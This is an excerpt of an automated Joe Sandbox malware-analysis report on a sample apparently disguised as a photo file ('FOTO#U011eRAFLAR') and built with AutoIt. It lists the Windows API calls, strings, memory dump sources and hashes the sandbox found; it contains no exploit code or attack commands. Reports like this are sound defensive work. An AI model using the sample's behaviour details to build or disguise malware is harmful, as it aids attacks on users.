                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharUpper
                                                                      • String ID: STOP
                                                                      • API String ID: 1256254125-2411985666
                                                                      • Opcode ID: 4b96198c1088e81b91154e2bd16839e9e33de38be66f3509f7db301de8126f4a
                                                                      • Instruction ID: 2f70f3e54db8678913d7b83cc4e3139aecc2dfaeed9c961651de633997608c69
                                                                      • Opcode Fuzzy Hash: 4b96198c1088e81b91154e2bd16839e9e33de38be66f3509f7db301de8126f4a
                                                                      • Instruction Fuzzy Hash: A301C432510A279ACB12AFBDDC809BF7FA5EE61710B184524E8A997291FF30D940C670
                                                                      APIs
                                                                        • Part of subcall function 00D1B606: _wcslen.LIBCMT ref: 00D1B610
                                                                        • Part of subcall function 00D73BEF: GetClassNameW.USER32(?,?,000000FF), ref: 00D73C12
                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00D71C90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      • Opcode ID: 1893a6617d658a7770a0199ff5ee05e98a7bcee50141fd86624b0160061f5e46
                                                                      • Instruction ID: e9672a9171cf621654f55a3b590d88cd6c4db2d0715fa59df2246c0c268845da
                                                                      • Opcode Fuzzy Hash: 1893a6617d658a7770a0199ff5ee05e98a7bcee50141fd86624b0160061f5e46
                                                                      • Instruction Fuzzy Hash: 4D01D275A412247B8B05EBA8CC518FEB768EB56360B14460AF8665B3D1FE31990C8670
                                                                      APIs
                                                                        • Part of subcall function 00D1B606: _wcslen.LIBCMT ref: 00D1B610
                                                                        • Part of subcall function 00D73BEF: GetClassNameW.USER32(?,?,000000FF), ref: 00D73C12
                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00D71B8A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      • Opcode ID: 61fb182b03d7bee6ea10dd3f4e9e3639d3b72af8b24d4fdae55e6eeb2f159a42
                                                                      • Instruction ID: c9f837bda0eba329bd3de261f420deab1007e90d44d138c96ab74e77d9bbb815
                                                                      • Opcode Fuzzy Hash: 61fb182b03d7bee6ea10dd3f4e9e3639d3b72af8b24d4fdae55e6eeb2f159a42
                                                                      • Instruction Fuzzy Hash: 8501F275A41108BBCB14EBA4C862EFE77A8CB17390F14011AF44A77281FE20DE0C87B1
                                                                      APIs
                                                                        • Part of subcall function 00D1B606: _wcslen.LIBCMT ref: 00D1B610
                                                                        • Part of subcall function 00D73BEF: GetClassNameW.USER32(?,?,000000FF), ref: 00D73C12
                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00D71C0C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      • Opcode ID: 86872a6076b693551447021c4c0fdc10baadd4242ec8a9f179ac6eeec56ae9c5
                                                                      • Instruction ID: 2ce11ceb25c88ba391459f4dbdd156d9ba6c3928a9d30e94b1b4b1d066620225
                                                                      • Opcode Fuzzy Hash: 86872a6076b693551447021c4c0fdc10baadd4242ec8a9f179ac6eeec56ae9c5
                                                                      • Instruction Fuzzy Hash: DB01F7B5A8110476CB11EBA8C911AFE77A8CB12350F544016F446A7281FE21DE4892B1
                                                                      APIs
                                                                        • Part of subcall function 00D1B606: _wcslen.LIBCMT ref: 00D1B610
                                                                        • Part of subcall function 00D73BEF: GetClassNameW.USER32(?,?,000000FF), ref: 00D73C12
                                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00D71D17
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      • Opcode ID: 523c520814187f9d35b04f499a2b80117348012f27db653f848cb75fd3e829a2
                                                                      • Instruction ID: 8203bff88b1e436c070718a803dd368fecbeb5566f40e4575ffa789b5ed16a65
                                                                      • Opcode Fuzzy Hash: 523c520814187f9d35b04f499a2b80117348012f27db653f848cb75fd3e829a2
                                                                      • Instruction Fuzzy Hash: 81F0F975A4121476CB14FBA8DC51FFE7768EB01350F15051AF466672C1FF61990C8670
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: 3, 3, 16, 0
                                                                      • API String ID: 176396367-3261555341
                                                                      • Opcode ID: b64559c4c5812a72acc393a2323148ff54c6157cfc767eeb43d25a097c3e984e
                                                                      • Instruction ID: 509636006a2aa43b83a3bec5c8906bdccd392124f053c88e3a4f06af76bcc399
                                                                      • Opcode Fuzzy Hash: b64559c4c5812a72acc393a2323148ff54c6157cfc767eeb43d25a097c3e984e
                                                                      • Instruction Fuzzy Hash: D8E0D1473243505597312279ADC297F5189EFCD751B14143BFD91C2265FB94DC92E3B0
                                                                      APIs
                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00D70A67
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: AutoIt$Error allocating memory.
                                                                      • API String ID: 2030045667-4017498283
                                                                      • Opcode ID: 895ba1b32b6e83cbfa40e99a796d8165215fc6bca899869b469c39939e4a93c0
                                                                      • Instruction ID: 67878c3e9c358b838db7e6c440ed154c5a108c427a1c3d2ad1d99d4aebfadd34
                                                                      • Opcode Fuzzy Hash: 895ba1b32b6e83cbfa40e99a796d8165215fc6bca899869b469c39939e4a93c0
                                                                      • Instruction Fuzzy Hash: E9E0D83224831476D2103794BC03F897A95CF09B20F144426F748945C38EE1248006B8
                                                                      APIs
                                                                        • Part of subcall function 00D2F8A8: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00D30CF1,?,?,?,00D1100A), ref: 00D2F8AD
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00D1100A), ref: 00D30CF5
                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D1100A), ref: 00D30D04
                                                                      Strings
                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D30CFF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                      • API String ID: 55579361-631824599
                                                                      • Opcode ID: 9da28f569cb32070ff0dc3bd31f1ec09835cb94fe67e6bb21dc55f5f76e5f201
                                                                      • Instruction ID: 82af346966cfb461410d083dde3e9ce87c1a87e9424905cad20ccd0e188a0b43
                                                                      • Opcode Fuzzy Hash: 9da28f569cb32070ff0dc3bd31f1ec09835cb94fe67e6bb21dc55f5f76e5f201
                                                                      • Instruction Fuzzy Hash: EBE065702007108BD360AFA8E854782BBE0EB05744F00896CE486C2B51DBB4E488CBB1
                                                                      APIs
                                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00D82F4D
                                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00D82F62
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Temp$FileNamePath
                                                                      • String ID: aut
                                                                      • API String ID: 3285503233-3010740371
                                                                      • Opcode ID: 83b009cafbdd377cd56c9e154c44883de191112bc287eec57b7a0ca48c9c470e
                                                                      • Instruction ID: 9c563682426273c6b4f4353a6a652fbaf3e89c448309c9671273296d5a22515a
                                                                      • Opcode Fuzzy Hash: 83b009cafbdd377cd56c9e154c44883de191112bc287eec57b7a0ca48c9c470e
                                                                      • Instruction Fuzzy Hash: 00D05B7651032467DA6097949D0DFC73A6CD706760F400151B655D1191DAB0D544C6F4
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: LocalTime
                                                                      • String ID: %.3d$X64
                                                                      • API String ID: 481472006-1077770165
                                                                      • Opcode ID: f613c4234bf2d038e2474c49a4920b118439075ee67797550a4c0d38c878c16a
                                                                      • Instruction ID: 67915826487e95b6af3f2a38ed73c629842d6011febe82050650175300f38279
                                                                      • Opcode Fuzzy Hash: f613c4234bf2d038e2474c49a4920b118439075ee67797550a4c0d38c878c16a
                                                                      • Instruction Fuzzy Hash: CBD01265D0C118DBCB80DBE0AC458B9737DAB28304F508493F846E2000E634C6486B31
                                                                      APIs
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DA229F
                                                                      • PostMessageW.USER32(00000000), ref: 00DA22A6
                                                                        • Part of subcall function 00D7E899: Sleep.KERNEL32 ref: 00D7E911
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
                                                                      • Opcode ID: 2dc21c1c3e30cce5665f5603bb2a147a6436c019be014031fb28fc6a47257cc2
                                                                      • Instruction ID: 732af45b19eb8ac2ccbea4704b86f33bf06dc2b5c6ae6c330456ae832f8c3628
                                                                      • Opcode Fuzzy Hash: 2dc21c1c3e30cce5665f5603bb2a147a6436c019be014031fb28fc6a47257cc2
                                                                      • Instruction Fuzzy Hash: 26D0C9717A03107AE264A770AC0FFCA6A189B46B20F019916764AEA2D0C9A4A8008674
                                                                      APIs
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DA225F
                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00DA2272
                                                                        • Part of subcall function 00D7E899: Sleep.KERNEL32 ref: 00D7E911
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
                                                                      • Opcode ID: a93676597179135ac18de4cd7f819cba903bafb7ec11bd171e6a785a32f7036b
                                                                      • Instruction ID: 78b66fef5561f849af7a14547ded87e606f85010fd66965e10ccf99dd3a57e0a
                                                                      • Opcode Fuzzy Hash: a93676597179135ac18de4cd7f819cba903bafb7ec11bd171e6a785a32f7036b
                                                                      • Instruction Fuzzy Hash: FDD0C9717A43107AE264A770AC0FFCA6A189B46B20F019916764AEA2D0C9A4A8008674
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00D4BE33
                                                                      • GetLastError.KERNEL32 ref: 00D4BE41
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D4BE9C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1717984340-0
                                                                      • Opcode ID: 8e8133090c9d4ee8b3dc21908a3b8c2aff1fd368050ec9cde1fb292e27a378c0
                                                                      • Instruction ID: 1aac209d6a3a1dfdee6f29ad8a58c10e22b993e7c8357fc5e01018b63e007ca7
                                                                      • Opcode Fuzzy Hash: 8e8133090c9d4ee8b3dc21908a3b8c2aff1fd368050ec9cde1fb292e27a378c0
                                                                      • Instruction Fuzzy Hash: 0441C531604256AFCB218F65C854AEA7BA4EF91730F18416AF999972A1DB30CC01DB70